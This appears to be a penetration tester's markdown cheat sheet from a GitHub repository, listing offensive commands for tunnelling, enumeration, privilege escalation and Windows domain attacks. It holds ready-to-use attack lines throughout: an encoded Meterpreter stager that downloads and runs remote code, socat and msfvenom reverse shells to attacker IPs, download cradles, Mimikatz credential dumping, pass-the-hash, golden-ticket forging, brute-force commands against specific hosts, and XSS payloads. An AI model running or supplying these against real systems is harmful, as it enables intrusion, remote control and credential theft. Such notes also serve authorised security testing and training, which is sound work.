Skip to content

Latest commit

 

History

History
executable file
·
288 lines (158 loc) · 16.2 KB

useful_tricks.md

File metadata and controls

executable file
·
288 lines (158 loc) · 16.2 KB

Usefuls scripts and commands

VNC over SSH Tunneling

  • In the hosting machine
>> sudo tightvncserver -geometry 1024x768

In the VNC host machine

ssh -L 5901:localhost:5901 -i .ssh/<ssh key> -N -f <ssh_user>@<machine_ip_OR_machine_url>

SSH over HTTP (Squid)

socat

socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128

ssh [email protected] -p 9999

proxytunnel

proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555

ssh [email protected] -p 5555

proxychains

http 192.168.1.41 3128

proxychains ssh [email protected]

proxychains corkscrew

ssh [email protected] -t /bin/sh

cork

Generic Enumeration

  • port fullscan - UDP scan

HTTP Enumeration

  • dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old - banner inspection - review source code - bruteforce with cewl-based dictionary - searchsploit look at versions properly - test all the paths with the exploits, mangle it - nmap --script vuln - nmap --script safe (ssl-cert, virtual hosts) - always incercept with Burp - nikto -h - LFI, RFI, SQL, RCE, XXE, SSRF injections - PUT method all directories - Change POST body encoding with Burp - Bruteforce parameter names - dirsearch with cookie once authenticated - download vulnerable application from exploit-db and examine it

SSH Enumeration

  • shellshock - bruteforce - user_enum - Debian OpenSSL Predictable PRNG

SMB Enumeration

  • nmap --script vuln - nmap --script smb* - nmap --script smb-enum-shares,smb-ls - enum4linux

BOF exploit-based

  • change shellcode - make sure all badchars are removed - read the exploit properly in case this makes changes in the shellcode - capture traffic with wireshark making sure the entire shellcode is transmited - run the exploit several times - make sure the JMP ESP matches OS and language

SNMP Enumeration

  • snmpcheck - snmpenum

PHP RCE

test: simple shell: file upload: ```'); ?>``` file upload evasion: rot13 + urlencode

RCE via webshell

SQLi UNION

search for response on HTML source code

Reverse HTTP Shell through Proxy

use payload/python/meterpreter/reverse_http proxy2 python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))" Finally we set up the handler: proxy3

Kernel Exploits

Linux: https://github.com/lucyoa/kernel-exploits Windows: https://github.com/abatchy17/WindowsExploits

Linux Privilege Escalation

  • sudo -l - Kernel Exploits - OS Exploits - Password reuse (mysql, .bash_history, 000-default.conf...) - Known binaries with suid flag and interactive (nmap) - Custom binaries with suid flag either using other binaries or with command execution - Writable files owned by root that get executed (cronjobs) - MySQL as root - Vulnerable services (chkrootkit, logrotate) - Writable /etc/passwd - Readable .bash_history - SSH private key - Listening ports on localhost - /etc/fstab - /etc/exports - /var/mail - Process as other user (root) executing something you have permissions to modify - SSH public key + Predictable PRNG - apt update hooking (Pre-Invoke)

Windows Privilege Escalation

  • Kernel Exploits - OS Exploits - Pass The Hash - Password reuse - DLL hijacking (Path) - Vulnerable services - Writable services binaries path - Unquoted services - Listening ports on localhost - Registry keys

Windows File Transfer

bitsadmin bitsadmin /transfer debjob /download /priority normal http://<ip>/shell.php c:\xampp\htdocs\shell.php cscript wget.vbs (code on the repo) cscript wget.vbs http://<ip>/test.txt test.txt powershell powershell -c "(new-object System.Net.WebClient).Downloadfile('http://<ip>/exploit.exe', 'C:\Windows\temp\exploit.txt')" ftp client:

echo open 2121 > ftpscript.txt
echo anonymous>> ftpscript.txt
echo PASS >> ftpscript.txt
echo bin >> ftpscript.txt
echo get meter.exe>> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt 

server: python -m pyftpdlib --port=2121 --write wget.exe Upload to vulnerable server from kali: /usr/share/windows-binaries/wget.exe wget.exe http://<ip>/file file certutil certutil -urlcache -split -f https://<ip>/file.txt file.txt

Password Cracking

zip fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip /etc/shadow

unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwords

keepass

keepass2john /root/Desktop/NewDatabase.kdb > file
john -incremental:alpha -format=keepass file

HTTP Brute Force

wfuzz POST wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://192.168.30.161/admin/index.php hydra POST hydra 192.168.30.161 -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20 wfuzz NTLM wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api wfuzz Basic Auth through Proxy wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/ActivosProduban/names.txt -z file,/root/Documents/Audits/ActivosProduban/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https://<ip>/api/v1/

TCP over HTTP

For this technique, it is necessary to be able to upload a file to a webserver. 1. reGeorg File upload to the server correct regeorge2 Tunnel creation python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp" Proxychains config regeorge1

proxychains nmap -F -sT 127.0.0.1
proxychains mysql -u root -p -h 127.0.0.1
proxychains ssh localhost

regeorge3 Reference: https://sensepost.com/discover/tools/reGeorg/ 2. ABBTTS Upload File abbtts5 Config proxychains and create the tunnel python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22 Usage ssh -p 22222 [email protected] abbtts7 Reference: https://github.com/nccgroup/ABPTTS

Interactive Reverse Shell

Attacker: socat file:`tty`,raw,echo=0 TCP-L:4444 Victim: wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444 Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

Windows

Bypass Applocker 1. rundll32 rundll32.exe PowerShdll.dll,main applocker Reference: https://github.com/p3nt4/PowerShdll 2. Alternative powershell files applocker2 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise Runas Powershell Start-Process powershell.exe -Verb runas Start-Process powershell.exe -Credential <user> View Shares With Permissions

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"

image View files that contain certain words recursively

 ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","*
admin*","*secret*" -Recurse 

image View files which name contains certain words recursively

ls -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse

image Connect to MSSQL Database

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1')

Invoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password -Query "exec sp_databases" 

Port Scanning

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1')

Invoke-Portscan -Hosts   -TopPorts 50

image View Domain Admins

 net groups /domain "Domain Admins"

image View Domain Controlers

nltest /dclist:  

image Invoke Mimikatz

IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz

Pass The Hash with Mimikatz

 Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'

Generate Golden Ticket (Domain Admin Required)

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'

image image

Invoke-Mimikatz  -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"

image

Invoke-Mimikatz  -Command '"kerberos::ptt admin.kirbi"'

image image Invoke a command Remotely

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')

 Invoke-WMIExec -Target SVHOST2  -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt"

Invoke Mimikatz Remotely

Invoke-WMIExec -Target SVHOST2  -Username Administrator
-Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"

image Get Hashes

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

image Check Pass The Hash with multiple servers

$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP")

foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose }

image References: https://www.hacklikeapornstar.com/

Bypass VPN routing restrictions

openconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.46.224.68’

vpn Reference: https://github.com/dlenski/vpn-slice

Man's Poor VPN

Traffic forward over SSH without needing to ssh -D <port>

sshuttle -vr [email protected] 180.46.0.0/16

shuttle2 Proof: mantis2 Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/

Download from apache directory list wget -m -np http://eamos.pf.jcu.cz/amos/kat_inf/externi/

$ nmap -p- -oA nmap.tcp 192.168.66.129 $ nmap -sU -p- -oA nmap.udp 192.168.66.129

$ ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -e php -u 192.168.66.129

$ python -c import pty; pty.spawn("/bin/sh") $ stty raw -echo

LinEnum.sh linuxprivchecker.py unixprivesc.sh

./dirsearch.py -u http://88.198.233.174:42272 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -f -r

sqlmap -r /tmp/req.txt -v -a --level 4 --risk 3

hydra 88.198.233.174 -s 42159 http-form-post "/index.php:password=^PASS^:Invalid password!" -l '' -P /usr/share/wordlists/seclists/Passwords/rockyou-75.txt -t 10 -w 30 -o hydra-http-post-attack.txt

nmap -sS -A -PN -p- --script=http-title dontscanme.bro

hydra 88.198.233.174 -s 42181 http-form-post "/main/index.php:name1=^USER^&name2=^PASS^:Wrong Credentials baby!" -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/seclists/Passwords/rockyou-75.txt -t 10 -w 30 -o /tmp/hydra-http-post-attack.txt

http://185.45.192.228/xssChall/1.php?xss=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E http://185.45.192.228/xssChall/2.php?xss=images.jpeg%27onmouseover=%22alert(%27xxs%27)%22 http://185.45.192.228/xssChall/3.php?xss=<script>window.onload=function(){eval(window.atob('ZXZhbChhbGVydCgxKSk7Cg=='))}</script>

http://185.45.192.228/xssChall/5.php?xss=%22onmousemove=%22window[%27al\u0065rt%27](1337)%22

http://185.45.192.228/xssChall/6.php?xss=%27%3Cscript%3Ewindow.onload=function(){window[%27al\u0065rt%27](1337)}%3C/script%3E

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.27 -x '.php' -e -t 25

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.27 -e -t 25

use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 10.10.17.29 set LPORT 5555 set ExitOnSession false exploit -j -z

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.17.29 LPORT=5555> -f raw > shell.php

python -c 'import pty; pty.spawn("/bin/bash")'